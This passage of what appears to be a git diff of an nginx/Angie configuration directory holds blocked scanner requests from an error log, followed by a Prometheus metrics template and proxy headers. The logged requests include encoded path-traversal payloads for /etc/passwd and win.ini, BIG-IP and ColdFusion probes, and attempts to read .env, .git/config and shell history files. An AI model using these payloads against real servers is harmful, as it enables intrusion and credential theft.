/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:06:41 [error] 3658523#3658523: *787373 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:22:13 [error] 3658523#3658523: *788829 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:22:27 [error] 3658523#3658523: *788855 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.s3cfg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:22:34 [error] 3658523#3658523: *788869 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:22:52 [error] 3658523#3658523: *788903 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:22:56 [error] 3658522#3658522: *788908 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:23:36 [error] 3658523#3658523: *788961 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:24:34 [error] 3658523#3658523: *789056 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:25:44 [error] 3658523#3658523: *789167 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:30:14 [error] 3658523#3658523: *789527 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:37:14 [error] 3658523#3658523: *790099 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:43:04 [error] 3658523#3658523: *790508 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:43:04 [error] 3658523#3658523: *790509 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:43:04 [error] 3658523#3658523: *790511 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:43:04 [error] 3658523#3658523: *790512 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:43:05 [error] 3658523#3658523: *790513 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:43:05 [error] 3658523#3658523: *790514 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:43:06 [error] 3658523#3658523: *790529 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:44:27 [error] 3658523#3658523: *790593 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:47:54 [error] 3658523#3658523: *790836 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/31 00:12:51 [error] 3658523#3658523: *792511 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/31 00:14:24 [error] 3658523#3658523: *792676 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea/httpRequests/http-requests-log.http HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/31 00:15:08 [error] 3658523#3658523: *792743 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea/httpRequests/http-client.cookies HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/01 02:43:40 [error] 3658523#3658523: *925883 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/11/01 11:32:29 [error] 4140279#4140279: *45507 access forbidden by rule, client: 172.190.142.176, server: nginx.linuxiarz.pl, request: "GET /.bod/.ll/ss.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 06:31:12 [error] 1288835#1288835: *391235 access forbidden by rule, client: 213.209.157.81, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 11:50:32 [error] 1288835#1288835: *424227 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:33 [error] 1288835#1288835: *424237 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:33 [error] 1288835#1288835: *424243 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:34 [error] 1288835#1288835: *424248 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:34 [error] 1288835#1288835: *424249 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:35 [error] 1288835#1288835: *424251 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /.config.yaml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:35 [error] 1288835#1288835: *424255 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:36 [error] 1288835#1288835: *424262 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:36 [error] 1288835#1288835: *424265 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /web/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:36 [error] 1288835#1288835: *424267 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:37 [error] 1288835#1288835: *424270 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:37 [error] 1288835#1288835: *424274 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:38 [error] 1288835#1288835: *424282 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /images/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:39 [error] 1288835#1288835: *424283 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /.env.save.1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:39 [error] 1288835#1288835: *424285 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:40 [error] 1288835#1288835: *424288 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /API/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 11:50:40 [error] 1288835#1288835: *424289 access forbidden by rule, client: 204.76.203.31, server: nginx.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/06 15:35:39 [error] 1288835#1288835: *449542 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:41 [error] 1288835#1288835: *449554 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:42 [error] 1288835#1288835: *449562 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:43 [error] 1288835#1288835: *449568 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:43 [error] 1288835#1288835: *449571 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:43 [error] 1288835#1288835: *449575 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /.config.yaml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:43 [error] 1288835#1288835: *449578 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:44 [error] 1288835#1288835: *449584 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:45 [error] 1288835#1288835: *449585 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /web/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:45 [error] 1288835#1288835: *449586 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:45 [error] 1288835#1288835: *449588 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:46 [error] 1288835#1288835: *449593 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:46 [error] 1288835#1288835: *449598 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /images/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:47 [error] 1288835#1288835: *449601 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /.env.save.1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:47 [error] 1288835#1288835: *449605 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:47 [error] 1288835#1288835: *449606 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /API/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/06 15:35:48 [error] 1288835#1288835: *449608 access forbidden by rule, client: 204.76.203.31, server: kodi.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/07 20:56:16 [error] 1288835#1288835: *711018 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/11/10 16:40:54 [error] 1288835#1288835: *1204909 access forbidden by rule, client: 34.16.164.246, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/11 02:49:47 [error] 1288835#1288835: *1231978 access forbidden by rule, client: 78.153.140.128, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/11 19:17:42 [error] 1288835#1288835: *1286158 access forbidden by rule, client: 104.219.236.180, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/12 20:36:50 [error] 1288835#1288835: *1377236 access forbidden by rule, client: 78.153.140.128, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/12 20:36:53 [error] 1288835#1288835: *1377253 access forbidden by rule, client: 78.153.140.128, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/11/13 14:17:42 [error] 1288835#1288835: *1451547 access forbidden by rule, client: 78.153.140.218, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/14 22:24:54 [error] 1288835#1288835: *1599180 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/11/15 00:10:24 [error] 1288835#1288835: *1604546 access forbidden by rule, client: 206.189.158.241, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/11/15 00:10:26 [error] 1288835#1288835: *1604546 access forbidden by rule, client: 206.189.158.241, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" diff --git a/prometheus_all.conf.dpkg-dist b/prometheus_all.conf.dpkg-dist new file mode 100644 index 0000000..b2aa93a --- /dev/null +++ b/prometheus_all.conf.dpkg-dist @@ -0,0 +1,369 @@ + +prometheus_template all { + +angie_connections_accepted $p8s_value + path=/connections/accepted + type=counter + 'help=The total number of accepted client connections.'; + +angie_connections_dropped $p8s_value + path=/connections/dropped + type=counter + 'help=The total number of dropped client connections.'; + +angie_connections_active $p8s_value + path=/connections/active + type=gauge + 'help=The current number of active client connections.'; + +angie_connections_idle $p8s_value + path=/connections/idle + type=gauge + 'help=The current number of idle client connections.'; + + +'angie_slabs_pages_used{zone="$1"}' $p8s_value + path=~^/slabs/([^/]+)/pages/used$ + type=gauge + 'help=The number of currently used memory pages in a slab zone.'; + +'angie_slabs_pages_free{zone="$1"}' $p8s_value + path=~^/slabs/([^/]+)/pages/free$ + type=gauge + 'help=The number of currently free memory pages in a slab zone.'; + + +'angie_slabs_pages_slots_used{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/used$ + type=gauge + 'help=The number of currently used memory slots of a specific size in a slab zone.'; + +'angie_slabs_pages_slots_free{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/free$ + type=gauge + 'help=The number of currently free memory slots of a specific size in a slab zone.'; + +'angie_slabs_pages_slots_reqs{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/reqs$ + type=counter + 'help=The total number of attempts to allocate a memory slot of a specific size in a slab zone.'; + +'angie_slabs_pages_slots_fails{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/fails$ + type=counter + 'help=The number of unsuccessful attempts to allocate a memory slot of a specific size in a slab zone.'; + + +'angie_resolvers_queries{zone="$1",type="$2"}' $p8s_value + path=~^/resolvers/([^/]+)/queries/([^/]+)$ + type=counter + 'help=The number of queries of a specific type to resolve in a resolver zone.'; + +'angie_resolvers_sent{zone="$1",type="$2"}' $p8s_value + path=~^/resolvers/([^/]+)/sent/([^/]+)$ + type=counter + 'help=The number of sent DNS queries of a specific type to resolve in a resolver zone.'; + +'angie_resolvers_responses{zone="$1",status="$2"}' $p8s_value + path=~^/resolvers/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of resolution results with a specific status in a resolver zone.'; + + +'angie_http_server_zones_ssl_handshaked{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/handshaked$ + type=counter + 'help=The total number of successful SSL handshakes in an HTTP server zone.'; + +'angie_http_server_zones_ssl_reuses{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/reuses$ + type=counter + 'help=The total number of session reuses during SSL handshakes in an HTTP server zone.'; + +'angie_http_server_zones_ssl_timedout{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/timedout$ + type=counter + 'help=The total number of timed-out SSL handshakes in an HTTP server zone.'; + +'angie_http_server_zones_ssl_failed{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/failed$ + type=counter + 'help=The total number of failed SSL handshakes in an HTTP server zone.'; + + +'angie_http_server_zones_requests_total{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/requests/total$ + type=counter + 'help=The total number of client requests received in an HTTP server zone.'; + +'angie_http_server_zones_requests_processing{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/requests/processing$ + type=gauge + 'help=The number of client requests currently being processed in an HTTP server zone.'; + +'angie_http_server_zones_requests_discarded{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/requests/discarded$ + type=counter + 'help=The total number of client requests completed in an HTTP server zone without sending a response.'; + + +'angie_http_server_zones_responses{zone="$1",code="$2"}' $p8s_value + path=~^/http/server_zones/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of responses with a specific status in an HTTP server zone.'; + + +'angie_http_server_zones_data_received{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from clients in an HTTP server zone.'; + +'angie_http_server_zones_data_sent{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to clients in an HTTP server zone.'; + + +'angie_http_location_zones_requests_total{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/requests/total$ + type=counter + 'help=The total number of client requests in an HTTP location zone.'; + +'angie_http_location_zones_requests_discarded{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/requests/discarded$ + type=counter + 'help=The total number of client requests completed in an HTTP location zone without sending a response.'; + + +'angie_http_location_zones_responses{zone="$1",code="$2"}' $p8s_value + path=~^/http/location_zones/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of responses with a specific status in an HTTP location zone.'; + + +'angie_http_location_zones_data_received{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from clients in an HTTP location zone.'; + +'angie_http_location_zones_data_sent{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to clients in an HTTP location zone.'; + + +'angie_http_upstreams_peers_state{upstream="$1",peer="$2"}' $p8st_all_ups_state + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/state$ + type=gauge + 'help=The current state of an upstream peer in "HTTP": 1 - up, 2 - down, 3 - unavailable, or 4 - recovering.'; + + +'angie_http_upstreams_peers_selected_current{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/selected/current$ + type=gauge + 'help=The number of requests currently being processed by an upstream peer in "HTTP".'; + +'angie_http_upstreams_peers_selected_total{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/selected/total$ + type=counter + 'help=The total number of attempts to use an upstream peer in "HTTP".'; + + +'angie_http_upstreams_peers_responses{upstream="$1",peer="$2",code="$3"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of responses with a specific status received from an upstream peer in "HTTP".'; + + +'angie_http_upstreams_peers_data_sent{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to an upstream peer in "HTTP".'; + +'angie_http_upstreams_peers_data_received{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from an upstream peer in "HTTP".'; + + +'angie_http_upstreams_peers_health_fails{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/health/fails$ + type=counter + 'help=The total number of unsuccessful attempts to communicate with an upstream peer in "HTTP".'; + +'angie_http_upstreams_peers_health_unavailable{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/health/unavailable$ + type=counter + 'help=The number of times when an upstream peer in "HTTP" became "unavailable" due to reaching the max_fails limit.'; + +'angie_http_upstreams_peers_health_downtime{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/health/downtime$ + type=counter + 'help=The total time (in milliseconds) that an upstream peer in "HTTP" was "unavailable".'; + + +'angie_http_upstreams_keepalive{upstream="$1"}' $p8s_value + path=~^/http/upstreams/([^/]+)/keepalive$ + type=gauge + 'help=The number of currently cached keepalive connections for an HTTP upstream.'; + + +'angie_http_caches_responses{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/responses$ + type=counter + 'help=The total number of responses processed in an HTTP cache zone with a specific cache status.'; + +'angie_http_caches_bytes{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/bytes$ + type=counter + 'help=The total number of bytes processed in an HTTP cache zone with a specific cache status.'; + +'angie_http_caches_responses_written{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/responses_written$ + type=counter + 'help=The total number of responses written to an HTTP cache zone with a specific cache status.'; + +'angie_http_caches_bytes_written{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/bytes_written$ + type=counter + 'help=The total number of bytes written to an HTTP cache zone with a specific cache status.'; + + +'angie_http_caches_size{zone="$1"}' $p8s_value + path=~^/http/caches/([^/]+)/size$ + type=gauge + 'help=The current size (in bytes) of cached responses in an HTTP cache zone.'; + + +'angie_http_caches_shards_size{zone="$1",path="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/shards/([^/]+)/size$ + type=gauge + 'help=The current size (in bytes) of cached responses in a shard path of an HTTP cache zone.'; + + +'angie_http_limit_conns{zone="$1",status="$2"}' $p8s_value + path=~^/http/limit_conns/([^/]+)/([^/]+)$ + type=counter + 'help=The number of requests processed by an HTTP limit_conn zone with a specific result.'; + +'angie_http_limit_reqs{zone="$1",status="$2"}' $p8s_value + path=~^/http/limit_reqs/([^/]+)/([^/]+)$ + type=counter + 'help=The number of requests processed by an HTTP limit_reqs zone with a specific result.'; + + +'angie_stream_server_zones_ssl_handshaked{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/handshaked$ + type=counter + 'help=The total number of successful SSL handshakes in a stream server zone.'; + +'angie_stream_server_zones_ssl_reuses{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/reuses$ + type=counter + 'help=The total number of session reuses during SSL handshakes in a stream server zone.'; + +'angie_stream_server_zones_ssl_timedout{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/timedout$ + type=counter + 'help=The total number of timed-out SSL handshakes in a stream server zone.'; + +'angie_stream_server_zones_ssl_failed{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/failed$ + type=counter + 'help=The total number of failed SSL handshakes in a stream server zone.'; + + +'angie_stream_server_zones_connections_total{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/total$ + type=counter + 'help=The total number of client connections received in a stream server zone.'; + +'angie_stream_server_zones_connections_processing{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/processing$ + type=gauge + 'help=The number of client connections currently being processed in a stream server zone.'; + +'angie_stream_server_zones_connections_discarded{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/discarded$ + type=counter + 'help=The total number of client connections completed in a stream server zone without establishing a session.'; + +'angie_stream_server_zones_connections_passed{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/passed$ + type=counter + 'help=The total number of client connections in a stream server zone passed for handling to a different listening socket.'; + + +'angie_stream_server_zones_sessions{zone="$1",status="$2"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/sessions/([^/]+)$ + type=counter + 'help=The number of sessions finished with a specific status in a stream server zone.'; + + +'angie_stream_server_zones_data_received{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from clients in a stream server zone.'; + +'angie_stream_server_zones_data_sent{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to clients in a stream server zone.'; + + +'angie_stream_upstreams_peers_state{upstream="$1",peer="$2"}' $p8st_all_ups_state + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/state$ + type=gauge + 'help=The current state of an upstream peer in "stream": 1 - up, 2 - down, 3 - unavailable, or 4 - recovering.'; + + +'angie_stream_upstreams_peers_selected_current{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/selected/current$ + type=gauge + 'help=The number of sessions currently being processed by an upstream peer in "stream".'; + +'angie_stream_upstreams_peers_selected_total{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/selected/total$ + type=counter + 'help=The total number of attempts to use an upstream peer in "stream".'; + + +'angie_stream_upstreams_peers_data_sent{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to an upstream peer in "stream".'; + +'angie_stream_upstreams_peers_data_received{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from an upstream peer in "stream".'; + + +'angie_stream_upstreams_peers_health_fails{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/health/fails$ + type=counter + 'help=The total number of unsuccessful attempts to communicate with an upstream peer in "stream".'; + +'angie_stream_upstreams_peers_health_unavailable{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/health/unavailable$ + type=counter + 'help=The number of times when an upstream peer in "stream" became "unavailable" due to reaching the max_fails limit.'; + +'angie_stream_upstreams_peers_health_downtime{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/health/downtime$ + type=counter + 'help=The total time (in milliseconds) that an upstream peer in "stream" was "unavailable".'; +} + +map $p8s_value $p8st_all_ups_state { + volatile; + "up" 1; + "down" 2; + "unavailable" 3; + "recovering" 4; +# "unhealthy" 5; +# "checking" 6; +# "draining" 7; + "busy" 8; + default 0; +} diff --git a/proxy_params b/proxy_params new file mode 100644 index 0000000..df75bc5 --- /dev/null +++ b/proxy_params @@ -0,0 +1,4 @@ +proxy_set_header Host $http_host; +proxy_set_header X-Real-IP $remote_addr; +proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; +proxy_set_header X-Forwarded-Proto $scheme; diff --git a/scgi_params b/scgi_params new file mode 100644 index 0000000..6d4ce4f --- /dev/null +++ 